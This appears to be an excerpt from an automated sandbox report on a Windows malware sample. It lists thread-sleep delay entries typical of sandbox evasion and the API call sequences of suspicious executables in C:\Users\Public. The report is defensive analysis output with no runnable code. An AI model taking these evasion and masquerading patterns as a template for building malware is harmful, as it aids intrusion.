              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599188
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599063
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598938
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598719
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598594
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598266
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598157
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598032
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597907
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597344
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596113
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594110
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 2404Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 7409Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8423
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1439
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1604
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8216
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.4 %
              Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 9.5 %
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4896Thread sleep count: 2404 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599888s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4896Thread sleep count: 7409 > 30Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599769s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599644s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599519s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599394s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599269s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599150s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599034s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598909s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598784s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598659s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598534s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598409s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598284s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598159s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598023s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597716s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597596s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597472s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597347s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597222s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597097s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596972s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596847s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596722s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596597s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596472s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596347s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596222s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596097s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595972s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595847s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595722s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595597s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595472s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595347s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595222s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595097s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594972s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594847s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594722s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594472s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594347s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594222s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594097s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -593972s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -593847s >= -30000sJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -25825441703193356s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -600000s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599890s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 7148Thread sleep count: 8423 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599781s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599672s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599562s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 7148Thread sleep count: 1439 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599453s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599343s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599234s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599125s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599015s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598906s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598797s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598687s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598578s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598468s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598355s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598250s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598140s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598031s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597922s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597812s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597703s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597593s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597484s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597375s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597265s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597156s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597047s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596937s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596828s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596718s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596609s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596500s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596390s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596281s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596172s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596062s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595953s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595843s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595733s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595624s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595515s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595406s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595297s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595187s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595078s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594968s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594859s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594750s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594640s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep count: 32 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -29514790517935264s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -600000s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599891s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 3600Thread sleep count: 1604 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 3600Thread sleep count: 8216 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599782s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599657s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599547s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599438s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599313s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599188s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599063s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598938s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598828s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598719s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598594s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598484s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598375s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598266s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598157s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598032s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597907s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597782s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597672s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597562s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597453s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597344s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597110s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596113s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595110s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594110s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7AB1235B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF792D7B3D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF792D7D4A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D3D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF792DB3674
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF792D7DBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF792DD19F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF792DD1B04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D75E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF792D75E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF792DD234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF792D6C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF792DD6F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD3100
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD10C4
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_028F58B4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF7AB121560
